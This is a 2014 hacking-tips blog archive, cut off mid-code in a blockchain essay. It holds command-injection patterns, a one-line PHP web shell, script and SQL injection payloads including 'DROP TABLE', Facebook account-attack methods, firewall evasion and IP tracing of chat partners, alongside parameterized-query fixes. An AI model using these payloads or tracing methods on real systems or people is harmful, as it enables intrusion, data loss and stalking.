
Tuesday, December 30, 2014

Trace Facebook Friends Location While Chatting

Trace Unknown Facebook Users Location While Chatting
There are many reasons you might want to know a Facebook user's location. For example, you may have received a message from an unknown person with whom you have never interacted before. I do not believe what a Facebook user's timeline looks like. Here is a cool and simple way to trace any friend on Facebook. It's the most useful Facebook trick. If you have unknown friends in your Facebook account and after some time you come to believe that one of them is a fake person, then with the help of this Facebook trick you can trace their actual location. I often accept many unknown friend requests. One day, a Facebook friend of mine started commenting badly on my posts, and when I looked at his timeline I found England as his current city, so I started researching this. Finally I came to know his geolocation along with his ISP.
Here are the steps to reveal a Facebook friend's location.
First of all you have to find the IP address of the specific user.
To do so we will use the netstat command in Windows. Just invite or ping him for a chat. As soon as you start the chat, open Command Prompt on your PC (click Start > Run and type cmd).
Note: Before trying this, make sure you close all the other tabs in your browser and keep only the Facebook tab open. Also clear the history and cache from your browser.
1. In the command prompt, type netstat -an and hit the Enter key.
You will get the IP addresses of all established connections. Note down all the suspicious IP addresses.
2. The next step is to trace the IP address that you found in step 1.
3. Go to IP Location Finder - Geolocation, where you will see your own IP address. Delete it, paste the IP address of your friend in the given box and click the Query button.
It will now show you all the information about that user, including his ISP and location. Use this trick only if you have a problem with some unknown friends.

Monday, December 29, 2014

How to Perform Command Injection Attacks

Command injection tutorial
Introduction: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
How to Perform Command Injection Attacks
In this article, we will talk about the varieties of command injection and how they can be executed. There are a variety of ways to inject shell commands. Assume for a moment that you have found a page which takes a filename as an argument and executes the shell command "cat" against that file. For example, a semicolon was used to separate one command from another, to indicate that after the cat command completed, another function should be called on the same line. There are a number of ways to string shell commands together to create new commands.
Here are the common operators you can use, as well as examples of how they might be used in an attack:

Redirection Operators
Examples: <, >>, >
These operators redirect either input or output somewhere else on the server. < will make whatever comes after it standard input. Replacing the filename with < filename will not change the output, but could be used to avoid some filters. > redirects command output, and can be used to modify files on the server, or create new ones altogether. Combined with the cat command, it could easily be used to add unix users to the system, or deface the website. Finally, >> appends text to a file and is not much different from the original output modifier, but again can be used to avoid some simplistic detection schemes.

Pipes
Examples: |
Pipes allow the user to chain multiple commands. It will redirect the output of one command into the next. So you can run unlimited commands by chaining them with multiple pipes, such as cat file1 | grep "string".

Inline commands
Examples: ;, $
This is the original example. Putting a semicolon asks the command line to execute everything before the semicolon, then execute everything else as if on a fresh command line.

Logical Operators
Examples: $, &&, ||
These operators perform some logical operation against the data before and after them on the command line.
Common Injection Patterns & Results
Here are the expected results from a number of common injection patterns (appending the below to a given input string, assuming all quotes are correctly paired):
`shell_command` - executes the command
$(shell_command) - executes the command
| shell_command - executes the command and returns the output of the command
|| shell_command - executes the command and returns the output of the command
; shell_command - executes the command and returns the output of the command
&& shell_command - executes the command and returns the output of the command
> target_file - overwrites the target file with the output of the previous command
>> target_file - appends the output of the previous command to the target file
< target_file - sends the contents of target_file to the previous command
- operator - adds additional operations to the target command
These examples are only scratching the surface of possible command injection vectors. The full breadth of attack possibilities is dependent upon the underlying function calls. For instance, if an underlying function is using a shell program such as awk, many more attack possibilities arise than laid out here.
Finally, command injection can be more subtle than finding applications which directly call underlying operating system functions. If it is possible to inject code, say PHP code, then you can also perform command injections. Assume you find an application with a PUT vulnerability on a site which is PHP enabled. An attacker could simply upload a PHP file with a single line to have full access to a shell:
<?php
echo shell_exec('cat '.$_GET['command']);
?>
Thus, it should be noted that many types of attacks, including SQL injection, have shell injection as their primary end goal, as a means of gaining control of the server.
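The difference between handing the file name to a shell and passing it as a single argument, shown as an added example that is not part of the original article. The function names, the notes.txt file and the hostile input are constructed for illustration, and a POSIX system with cat and sh is assumed.

```python
import os
import subprocess
import tempfile


def cat_via_shell(base_dir, filename):
    """Vulnerable pattern from the text: the file name is pasted into a shell command line."""
    command = "cat " + os.path.join(base_dir, filename)
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def cat_without_shell(base_dir, filename):
    """Hardened form: confine the path to base_dir and pass it as a single argv entry."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the served directory")
    if not os.path.isfile(target):
        raise FileNotFoundError(filename)
    # No shell is started, so ; | && || $( ) ` < > are ordinary characters of the name.
    # "--" ends option parsing, so the name can never be read as an option of cat.
    done = subprocess.run(["cat", "--", target], capture_output=True, text=True, check=True)
    return done.stdout


def demo():
    """Run both handlers on constructed inputs and return what each one produced."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "notes.txt"), "w") as handle:
            handle.write("hello\n")
        hostile = "notes.txt; echo INJECTED"  # constructed input with a harmless marker
        results["shell"] = cat_via_shell(base, hostile)
        for label, name in (("argv", hostile),
                            ("traversal", "../outside.txt"),
                            ("normal", "notes.txt")):
            try:
                results[label] = cat_without_shell(base, name)
            except (ValueError, FileNotFoundError) as exc:
                results[label] = "rejected: " + type(exc).__name__
    return results


if __name__ == "__main__":
    for label, value in demo().items():
        print(label, repr(value))
```

The shell variant runs the text after the semicolon as a second command, while the argument-vector variant looks for a file literally named `notes.txt; echo INJECTED` and rejects it.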

Saturday, December 27, 2014

Top 10 Facebook Hacking Techniques

Top 10 Facebook hacking techniques
There are many ways to break into a Facebook account, and we have collected the 10 most common techniques.

1. Phishing
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are a variety of methods for carrying out a phishing attack. In a simple phishing attack, a hacker creates a fake login page which looks exactly like the real Facebook page and then asks the victim to log in. Once the victim logs in through the fake page, the victim's "Email Address" and "Password" are stored in a text file, and the hacker then downloads the text file and gets his hands on the victim's credentials. Some auto-liker websites are good examples of phishing. They ask a user to log in for an access token in order to get the username and password of the victim. [Beware]

2. Keylogging
Keylogging is the easiest way to hack a Facebook password. Keylogging can sometimes be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which, once installed on the victim's computer, will record everything the victim types on his/her computer. The logs are then sent back to the attacker, either by FTP or directly to the hacker's email address.

3. Stealers
Almost 80% of people use passwords stored in their browser to access Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealers are programs specially designed to capture the saved passwords stored in the victim's Internet browser.

4. Session Hijacking
Session hijacking can often be very dangerous if you are accessing Facebook over an http (non-secure) connection. In a session hijacking attack, a hacker steals the victim's browser cookie, which is used to authenticate the user on a website, and uses it to access the victim's account. Session hijacking is widely used on LAN and WiFi connections.

5. Sidejacking With Firesheep
Sidejacking attacks became common in late 2010, and they are still popular nowadays. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim are on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it is more targeted towards WiFi users.

6. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. If the hacker can gain access to the victim's mobile phone, then he can probably gain access to his/her Facebook account. There are lots of mobile spying programs used to monitor a cellphone. The most popular mobile phone spying programs are Mobile Spy and Spy Phone Gold.

7. DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack to replace the original Facebook page with his own fake page and hence get access to the victim's Facebook account.

8. USB Hacking
If an attacker has physical access to your computer, he could just insert a USB device programmed to automatically extract the passwords saved in the Internet browser.

9. Man In the Middle Attack
If the victim and attacker are on the same LAN and on a switch-based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capture all the traffic in between.

10. Botnets
Botnets are not commonly used for hacking Facebook accounts, because of their high setup costs. They are used to carry out more advanced attacks. A botnet is basically a collection of compromised computers. The infection process is the same as for keylogging; however, a botnet gives you additional options for carrying out attacks with the compromised computers. Some of the most popular botnets include Spyeye and Zeus.

Thursday, December 25, 2014

HTML Code Injection Technique

HTML code injection techniques
Introduction: This article is about HTML injection techniques used to exploit web site vulnerabilities. Nowadays it is unusual to find a site that is completely vulnerable to this type of attack, but only one is enough to exploit it. I'll compile these techniques together, in order to make them easier and more entertaining to read. HTML injection is a type of attack focused on the way HTML content is generated and interpreted by browsers on the client side. In addition, JavaScript is a widely used technology in dynamic web sites, so the use of techniques based on it, like injection, complements the term 'code injection'.

Code Injection
This type of attack is possible because client browsers, by default, interpret scripts embedded within HTML content, so if an attacker embeds script tags such as <SCRIPT>, <OBJECT>, <APPLET>, or <EMBED> into a web site, the web browser's JavaScript engine will execute them. Typical targets of this type of injection are forums, guestbooks, or any section where the administrator allows the insertion of text comments; if the web site does not filter the inserted comments and passes < or > through as real characters, a malicious user could type:
I like this site because <script>alert('Injected!');</script> teaches me a lot
If it works and you can see the message box, the door is open to the limits of the attacker's imagination! A common code insertion used to drive navigation to another website is something like this:
<H1> Vulnerability test </H1> <META HTTP-EQUIV="refresh" CONTENT="1;url=http://www.test.com">
The same within a <FK> or <LI> tag:
<FK STYLE="behavior: url(http://<<Other website>>);">
Other tags used to execute malicious JavaScript code are, for example, <BR>, <DIV>, even background-image:
<BR SIZE="&{alert('Injected')}">
<DIV STYLE="background-image: url(javascript:alert('Injected'))">
The <title> tag is a common weak point if it's generated dynamically. For example, suppose this situation:
<HTML>
<HEAD>
<TITLE>
<?php echo $_GET['titulo']; ?>
</TITLE>
</HEAD>
<BODY>
...
</BODY>
</HTML>
If you set the title to 'example </title> </head> </body><img src= http://myImage.png>', the resulting HTML would insert the 'myImage.png' image first of all:
<HTML>
<HEAD>
<TITLE>
example
</TITLE>
</HEAD>
<BODY><img src= http://myImage.png></TITLE> </HEAD> <BODY>...
</BODY>
</HTML>
There is another dangerous HTML tag that could exploit a web browser's frame support: <IFRAME>. This tag allows (within the sandbox security layer) cross-scripting exploits using web browser elements (the address bar or bookmarks, for example), but this topic is outside the scope of this article.
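Output encoding applied to the comment and title inputs quoted above, as an added example rather than code from the original article. The page template and function names are assumptions; Python's html.parser is used to list which elements each version of the markup actually contains.

```python
import html
from html.parser import HTMLParser

# Assumed page layout: a dynamic title and one visitor comment.
PAGE_TEMPLATE = ("<html><head><title>{title}</title></head>"
                 "<body><p>{comment}</p></body></html>")

# The two inputs quoted in the article.
TITLE_INPUT = "example </title> </head> </body><img src= http://myImage.png>"
COMMENT_INPUT = ("I like this site because <script>alert('Injected!');</script> "
                 "teaches me a lot")


class ElementCollector(HTMLParser):
    """Records the name of every element start tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.elements = []

    def handle_starttag(self, tag, attrs):
        self.elements.append(tag)


def render_raw(title, comment):
    """Vulnerable pattern: request values are pasted into the markup unchanged."""
    return PAGE_TEMPLATE.format(title=title, comment=comment)


def render_escaped(title, comment):
    """Output encoding: & < > " ' are turned into character references first."""
    return PAGE_TEMPLATE.format(title=html.escape(title, quote=True),
                                comment=html.escape(comment, quote=True))


def elements_in(markup):
    """Return the element names a parser finds in the markup, in document order."""
    collector = ElementCollector()
    collector.feed(markup)
    collector.close()
    return collector.elements


def demo():
    """Compare which elements exist with and without output encoding."""
    return {
        "raw": elements_in(render_raw(TITLE_INPUT, COMMENT_INPUT)),
        "escaped": elements_in(render_escaped(TITLE_INPUT, COMMENT_INPUT)),
    }


if __name__ == "__main__":
    for label, names in demo().items():
        print(label, names)
```

With encoding, the markup contains only the five elements of the template; without it, the visitor-supplied img and script elements become part of the document.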

Wednesday, December 24, 2014

Motivational Posters for All

The problem with those motivational posters that people keep sharing all over Facebook is that they’re often tailored to a specific way of thinking, usually either spiritual, religious or rational.  To be a little more accommodating I therefore thought I’d create a few motivational posters that provide a common message but are written in the three languages of spiritualism, religion and rationalism, that way you can share them with everyone without compromising their meaning.




SSH Tunnel Tutorial

Introduction: An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. An SSH tunnel can be used to transfer unencrypted traffic over a network through an encrypted channel. For example, we can use an SSH tunnel to securely transfer files between an FTP server and a client even though the FTP protocol itself is not encrypted. SSH tunnels also provide a means to bypass firewalls that prohibit or filter certain internet services. For example, an organization may block certain sites using its proxy filter, but users may not wish to have their web traffic monitored or blocked by the organization's proxy filter. If users can connect to an external SSH server, they can create an SSH tunnel to forward a given port on their local machine to port 80 on a remote web server via the external SSH server.
This SSH tunnel tutorial will deliberately bypass a firewall, and security admins will frown (at the very least) on you bypassing a corporate firewall.
*. How to encrypt anything over an SSH tunnel using a SOCKS proxy.
*. How to browse securely from hotspots or hide from corporate firewalls/sniffers.

SSH Tunnel Summary
Using an SSH server that has internet access as a browsing point, you will create an SSH tunnel from your local PC to a remote server, source all of your traffic from it, and encrypt communications to it using free software. This tutorial will show you how to set up an SSH tunnel and use it to create a SOCKS proxy. It requires an SSH account anywhere, even on your home PC with Cygwin or Ubuntu installed. You could then use this to tunnel from an unsafe place and browse as if you were at the safe, remote location instead. This is free.

SSH Tunnel Instructions
1. Find your current IP: go to whatismyip.com and look at your existing IP, without a proxy.
Reason: compare later when we have a tunnel.
2. Packet Capture
Th: !(ipv6.dst == ff02::1) && !(ipv6.dst == ff02::c) && !stp && !cdp && !dtp && !dhcpv6 && !arp && !nbns && !browser && !icmpv6 && !ip.src== 192.168.1.105 &&
Reason: verify that you are truly encrypted. This filter just hides network chatter. It's the same thing a snooper would see. Your filter may be different, or not required. I was on a chatty network when I inspected and thought this example would be worth showing.
3. Set up PuTTY for the SSH tunnel:
*. Session: user@yourserver.com:22
*. Connection > SSH: V2, Enable Compression
*. Connection > SSH > Tunnels > Source: 7070, Dynamic, ADD
*. Session: Save, Open
Or create an SSH tunnel via the command line:
ssh -D 7070 -p 22 user@yourserver.com sleep 9999
Reason: sets up a loopback port (7070) on your local PC and connects over port 22 to the remote shell.
4. Set up Firefox to use the tunnel:
*. Tools > Options > Network > Settings > Manual
*. Socks: 127.0.0.1:7070
*. Click OK.
5. Set up Firefox to use remote DNS
about:config network.proxy.socks_remote_dns=true
Reason: By default, your local PC will do the DNS lookups, which shows what websites you are going to, so this step sends DNS over the SSH tunnel.
6. Restart Browser
Reason: configures Firefox to route traffic through the tunnel you just made.
7. Test
*. View everything is over port 22
*. View IP is different from whatismyip.com
*. View filter in Wireshark: dns, there should be no entries.
References
*. https://addons.mozilla.org/en-US/thunderbird/user/323/ (FoxyProxy allows quick proxy swaps in Mozilla, Thunderbird, etc.)
*. ftp://ftp.chiark.greenend.org.uk/users/sgtatham/putty-latest/x86/putty.exe
*. http://www.wireshark.org/download.html

SSH Tunnel NOT SAFE
Is all browsing now encrypted? No, it’s only encrypted to the remote server. From that point on it’s normal. Though if you were browsing an https connection without cookies, it’s pretty hard to figure out what your traffic is. Cookies are relatively simple to capture, sniff then replay for a man in the middle type attack or privileged login.

Monday, December 22, 2014

SQL Injection: SQL for Web Pages

SQL Injection

SQL in Web Pages

When SQL is used to display data on a web page, it is common to let web users input their own search values. Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data:
Server Code
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
The example above creates a select statement by adding a variable (txtUserId) to a select string. The variable is fetched from the user input (Request) to the page. The rest of this chapter describes the potential dangers of using user input in SQL statements.

SQL Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL statement via web page input. Injected SQL commands can alter the SQL statement and compromise the security of a web application.

SQL Injection Based on 1=1 is Always True

Look at the example above one more time. Let's say that the original purpose of the code was to create an SQL statement to select a user with a given user id. If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this:
UserId: 105 or 1=1
Server Result
SELECT * FROM Users WHERE UserId = 105 or 1=1
The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true. Does the example above seem dangerous? What if the Users table contains names and passwords? The SQL statement above is much the same as this:
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1
A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.

SQL Injection Based on ""="" is Always True

Here is a common construction, used to verify user login to a web site:
User Name:
Password:
Server Code
uName = getRequestString("UserName");
uPass = getRequestString("UserPass");
sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"';
A smart hacker might get access to user names and passwords in a database by simply inserting " or ""=" into the user name or password text box. The code at the server will create a valid SQL statement like this:
Result
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
The resulting SQL is valid. It will return all rows from the table Users, since WHERE ""="" is always true.

SQL Injection Based on Batched SQL Statements

Most databases support batched SQL statements, separated by semicolons.
Example
SELECT * FROM Users; DROP TABLE Suppliers
The SQL above will return all rows in the Users table, and then delete the table called Suppliers. If we had the following server code:
Server Code
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
And the following input:
User id: 105; DROP TABLE Suppliers
The code at the server would create a valid SQL statement like this:
Result
SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers

Parameters for Protection

Some web developers use a "blacklist" of words or characters to search for in SQL input, to prevent SQL injection attacks. This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks) are used in common language, and should be allowed in many types of input. In fact it should be perfectly legal to input an SQL statement in a database field. The only proven way to protect a web site from SQL injection attacks is to use SQL parameters. SQL parameters are values that are added to an SQL query at execution time, in a controlled manner.
ASP.NET Razor Example
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = @0";
db.Execute(txtSQL,txtUserId);
Note that parameters are represented in the SQL statement by a @ marker. The SQL engine checks each parameter to ensure that it is correct for its column, and parameters are treated literally, not as part of the SQL to be executed.
Another Example
txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
db.Execute(txtSQL,txtNam,txtAdd,txtCit);
Examples
The following examples show how to build parameterized queries in some common web languages.
ASP.NET SELECT
txtUserId = getRequestString("UserId");
sql = "SELECT * FROM Customers WHERE CustomerId = @0";
command = new SqlCommand(sql);
command.Parameters.AddWithValue("@0",txtUserId);
command.ExecuteReader();
ASP.NET INSERT INTO
txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
command = new SqlCommand(txtSQL);
command.Parameters.AddWithValue("@0",txtNam);
command.Parameters.AddWithValue("@1",txtAdd);
command.Parameters.AddWithValue("@2",txtCit);
command.ExecuteNonQuery();
PHP INSERT INTO
$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City) VALUES (:nam, :add, :cit)");
$stmt->bindParam(':nam', $txtNam);
$stmt->bindParam(':add', $txtAdd);
$stmt->bindParam(':cit', $txtCit);
$stmt->execute();
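The 105 or 1=1 input run against a concatenated and a parameterized query, as an added example that is not from the original article. It uses Python's sqlite3 module, whose placeholder is ? rather than @0; the table contents and function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """In-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Users (UserId INTEGER NOT NULL, Name TEXT, Password TEXT);
        CREATE TABLE Suppliers (SupplierId INTEGER NOT NULL, Name TEXT);
        CREATE TABLE Customers (CustomerName TEXT, Address TEXT, City TEXT);
        INSERT INTO Users VALUES (105, 'alice', 'pw-a');
        INSERT INTO Users VALUES (106, 'bob', 'pw-b');
        INSERT INTO Users VALUES (107, 'carol', 'pw-c');
        INSERT INTO Suppliers VALUES (1, 'Acme');
    """)
    return db


def lookup_concatenated(db, user_id_text):
    """Vulnerable pattern from the text: the input becomes part of the SQL itself."""
    sql = "SELECT UserId, Name FROM Users WHERE UserId = " + user_id_text
    return db.execute(sql).fetchall()


def lookup_parameterized(db, user_id_text):
    """The statement text is fixed; the input is bound as one value at execution."""
    sql = "SELECT UserId, Name FROM Users WHERE UserId = ?"
    return db.execute(sql, (user_id_text,)).fetchall()


def add_customer(db, name, address, city):
    """Parameterized INSERT: quotes, semicolons and SQL keywords are stored as text."""
    db.execute(
        "INSERT INTO Customers (CustomerName, Address, City) VALUES (?, ?, ?)",
        (name, address, city),
    )
    return db.execute("SELECT CustomerName, Address, City FROM Customers").fetchall()


def table_names(db):
    rows = db.execute("SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
    return sorted(row[0] for row in rows)


def demo():
    db = make_db()
    return {
        "concatenated": lookup_concatenated(db, "105 or 1=1"),
        "parameterized": lookup_parameterized(db, "105 or 1=1"),
        "legitimate": lookup_parameterized(db, "105"),
        "stored": add_customer(db, "O'Brien", "105; DROP TABLE Suppliers", "Oslo"),
        "tables": table_names(db),
    }


if __name__ == "__main__":
    for label, value in demo().items():
        print(label, value)
```

The concatenated query returns every user, the parameterized one compares the whole input against UserId and matches nothing, and text that looks like SQL is stored unchanged without a blacklist.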




Sunday, December 21, 2014

How To Extract All Hyperlinks In A Web Page

Sometimes you might need all the hyperlinks from a webpage. For example, if you are a developer you might need a JavaScript or CSS file that a webpage loads from an external host. Sometimes this trick will also help you extract the download link from survey sites. Whatever the reason, let us learn how to do this. We will cover three different ways to extract hyperlinks from a webpage in this post.

Extract Hyperlinks From A Webpage In Chrome

This trick is very simple but is limited to Google Chrome users. The trick is performed via the Chrome Dev Tools.
Steps To Extract Hyperlinks From A Webpage In Chrome
1. Go to the page from which you want to extract the hyperlinks.
2. Click on 'Inspect Element' from the right-click menu.
3. Click on the 'Console' tab.
4. Now paste the following code in the input field.
$$('a').forEach(function (a) { console.log(a.href); });
5. Hit enter.

iWeb Tools's Link Extractor

This is a web-based service, which means you don't have to download any software, nor is it limited to any group of users. You can use this tool here. This tool will show the type of file along with the anchor text in the output field.
How To Use This Tool?

Using this tool is very simple. All you have to do is go to the above URL, enter the webpage URL in the input field and hit extract.

BuzzStream Tool

This is quite different from the other two because in this case we are extracting all the URLs from HTML code. This trick will not display the output links on the website itself. All the links on that page are exported as a CSV file which automatically downloads to your computer once you hit the create CSV button. The CSV file has three different columns: the actual link, its original website and the anchor text.
How To Use This Tool?
1. Go to Buzz Stream Urls Extract Tool.
2. Copy the source code of the webpage from which you want to extract the Url.
3. Paste it in the tool's input field and hit create CSV. A CSV file containing the hyperlinks will automatically be downloaded to your computer.

How To Get The Source Code Of Webpages

Chrome: Right click on the webpage and click on view page source or press Ctrl U.
Internet Explorer: Right click from the webpage and click on view source.
Firefox & Netscape: Right click and click on view page source or press Ctrl U.
Opera: From the view menu click on source or press Ctrl F3.

Wednesday, December 17, 2014

Rev. Libby Lane and Dr. Elena Piscopia

Dr. Elena Piscopia 
On the 25th June 1678 Elena Cornaro Piscopia earned a Doctorate in Philosophy at the University of Padua in Italy, making her the first woman to be awarded a doctorate. She would have earned a doctorate in theology had the Bishop of Padua not refused her doctorate of theology on the grounds that she was a woman. She later became a mathematics tutor at the University of Padua and was also considered an expert musician. Perhaps she would have been less successful had she tried to pursue a senior position in the Church.
Rev. Libby Lane
Over 336 years later on 17th December 2014 The Church of England appointed Reverend Libby Lane as its first female bishop. Surely an organisation that steadfastly still claims moral superiority over the faithless should have been first past the post rather than breathlessly wheezing as it finally stumbled over the equality line three centuries behind academia?

The problem with adopting an ideology rooted in a purported divinely revealed truth is that by its very nature it is extremely tricky to improve upon that divinely revealed truth in the light of new evidence and thinking without questioning the wisdom of the deity originally credited with it.

This particular example of lackadaisical Christian catch-up is therefore far from unprecedented.

Galileo was put on trial and condemned in 1616 and 1633 by the Roman Catholic Inquisition for contradicting its unquestionable scriptures by daring to use the scientific method to theorise that the earth in fact orbits the sun. It wasn’t until the 4th November 1992 that Pope John Paul II issued a weasel worded vindication of Galileo, long after the Church’s original position had become utterly untenable.

The speed at which the church was able to catch up with what now seems to be such obvious and basic gender equality is laughable. But it will need to speed up its reform process to a rate that will be uncomfortable to many of its members if it wants to try and keep in touch with the modern world.

The only alternative to such sensible liberal reforms is to simply stand still. In a post-enlightened world where society, morality and equality are advancing at an accelerating rate, standing still and refusing to rethink frequently now manifests itself as bigotry, with fundamentalism not far behind.

As religious views on women bishops and gay marriages become more polarised how close are we to the ultimate Christian reform of jettisoning the supernatural mumbo jumbo altogether? Bereft of its divisive mystical claptrap surely Christianity could be distilled down to a laudable set of ideas about being nice to one another that we could all rally behind.

How long will it be before Christianity officially abandons the pious petitioning of supernatural beings, implausible virgin births, credulous miracles, the wicked threat of eternal damnation and the fabricated bribe of immortality to the bigots and fundamentalists who prefer to stand still?

I suspect it will be considerably less than the 336 years it took Libby to catch up with Elena, but in the meantime we still have the British Humanist Association. But when the Church finally embraces this ultimate reform I’ll be happy to go back, after all they do have the better architecture.

 

Might pop into my local village Church for the Carol Service on Sunday though, I do like a nice sing-along at Xmas, as I think I mentioned last year.

Thursday, December 11, 2014

The dawn of trustworthy computing

When we currently use a smart phone or a laptop on a cell network or the Internet, the other end of these interactions typically runs on other solo computers, such as web servers. Practically all of these machines have architectures that were designed to be controlled by a single person or a hierarchy of people who know and trust each other. From the point of view of a remote web or app user, these architectures are based on full trust in an unknown "root" administrator, who can control everything that happens on the server: they can read, alter, delete, or block any data on that computer at will. Even data sent encrypted over a network is eventually decrypted and ends up on a computer controlled in this total way. With current web services we are fully trusting, in other words we are fully vulnerable to, the computer, or more specifically the people who have access to that computer, both insiders and hackers, to faithfully execute our orders, secure our payments, and so on. If somebody on the other end wants to ignore or falsify what you've instructed the web server to do, no strong security is stopping them, only fallible and expensive human institutions which often stop at national borders.

The high vulnerability we have to web servers stands in sharp contrast to traditional commercial protocols, such as ticket-selling at a movie theater, that distribute a transaction so that no employee can steal money or resources undetected. There is no "root administrator" at a movie theater who can pocket your cash undetected. Because, unlike a web server, these traditional protocols, called financial controls, can securely handle cash, you didn't have to fill out a form to see a movie, shop for groceries, or conduct most other kinds of every-day commerce. You just plunked down some coin and took your stuff or your seat. Imperfect and slow as these processes often are (or were), these analog or paper-based institutions often provided security, financial control, and/or verifiability of fiduciary transactions in many ways far superior to what is possible on web servers, at much less hassle and privacy loss to customers. On the Internet, instead of securely and reliably handing over cash and getting our goods or services, or at least a ticket, we have to fill out forms and make ourselves vulnerable to identity theft in order to participate in e-commerce, and it is often very difficult or even prohibitive to conduct many kinds of commerce, even purely online kinds, across borders and other trust boundaries. Today's computers are not very trustworthy, but they are so astronomically faster than humans at so many important tasks that we use them heavily anyway. We reap the tremendous benefits of computers and public networks at large costs of identity fraud and other increasingly disastrous attacks.

Recently developed and developing technology, often called "the block chain", is starting to change this. A block chain computer is a virtual computer, a computer in the cloud, shared across many traditional computers and protected by cryptography and consensus technology. A Turing-complete block chain with large state gives us this shared computer. Earlier efforts included state-machine replication (see list of papers linked below). QuixCoin is a recent project, and Ethereum a current one, that has implemented such a scheme. These block chain computers will allow us to put the most crucial parts of our online protocols on a far more reliable and secure footing, and make possible fiduciary interactions that we previously dared not do on a global network.

Much as pocket calculators pioneered an early era of limited personal computing before the dawn of the general-purpose personal computer, Bitcoin has pioneered the field of trustworthy computing with a partial block chain computer. Bitcoin has implemented a currency in which someone in Zimbabwe can pay somebody in Albania without any dependence on local institutions, and can do a number of other interesting trust-minimized operations, including multiple signature authority. But the limits of Bitcoin's language and its tiny memory mean it can't be used for most other fiduciary applications, the most obvious example being risk pools that share collateral across a pool of financial instruments.

A block-chain computer, in sharp contrast to a web server, is shared across many such traditional computers controlled by dozens to thousands of people. By its very design each computer checks each other's work, and thus a block chain computer reliably and securely executes our instructions up to the security limits of block chain technology, which is known formally as anonymous and probabilistic Byzantine consensus (sometimes also called Nakamoto consensus). The most famous security limit is the much-discussed "51% attack". We won't discuss this limit or the underlying technology further here, other than saying that the oft-used word "trustless" is exaggerated shorthand for the more accurate mouthful "trust-minimized", which I will use here. "Trust" used in this context means the need to trust remote strangers, and thus be vulnerable to them.

Trust-minimized code means you can trust the code without trusting the owners of any particular remote computer. A smart phone user in Albania can use the block chain to interact with a computer controlled by somebody in Zimbabwe, and they don't have to know or trust each other in any way, nor do they need to depend on the institutions of either's countries, for the underlying block chain computer to run its code securely and reliably. Regardless of where any of the computers or their owners are, the block chain computer they share will execute as reliably and securely as consensus technology allows, up to the aforementioned limits. This is an extremely high level of reliability, and a very high level of security, compared to web server technology. 

Instead of the cashier and ticket-ripper of the movie theater, the block chain consists of thousands of computers that can process digital tickets, money, and many other fiduciary objects in digital form.  Think of thousands of robots wearing green eye shades, all checking each other's accounting. Individually the robots (or their owners) are not very trustworthy, but collectively, coordinated by mathematics, they produce results of high reliability and security.

Often block chain proponents talk about the "decentralized" block chain versus the "centralized" web or centralized institutions. It's actually the protocol (Nakamoto consensus, which is highly distributed) combined with strong cryptography, rather than just decentralization per se, that is the source of the far higher reliability and much lower vulnerability of block chains. The cryptography provides an unforgeable chain of evidence for all transactions and other data uploaded to the block chain. Many other decentralized or peer-to-peer (P2P) technologies do not provide anything close to the security and reliability provided by a block chain protected by full Byzantine or Nakamoto consensus and cryptographic hash chains, but deceptively style themselves as block chains or cryptocurrency.
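The two ingredients named above, a cryptographic hash chain and replicas that check each other's copies, can be seen working together in a small ledger. This is an added example, not code from the original post or from any block chain project; the transaction fields, the names alice, bob, carol and mallory, and the simple majority vote (a stand-in for Nakamoto consensus) are assumptions.

```python
import hashlib
import json
from collections import Counter

GENESIS = "0" * 64  # constructed starting value, an assumption of this example

def entry_hash(prev_hash, tx):
    """Hash of one entry; it commits to the previous entry's hash as well."""
    payload = json.dumps({"prev": prev_hash, "tx": tx}, sort_keys=True)
    return hashlib.sha256(payload.encode()).hexdigest()

def build(txs):
    """Build a hash-chained ledger from a list of transactions."""
    chain, prev = [], GENESIS
    for tx in txs:
        h = entry_hash(prev, tx)
        chain.append({"prev": prev, "tx": tx, "hash": h})
        prev = h
    return chain

def first_bad_entry(chain):
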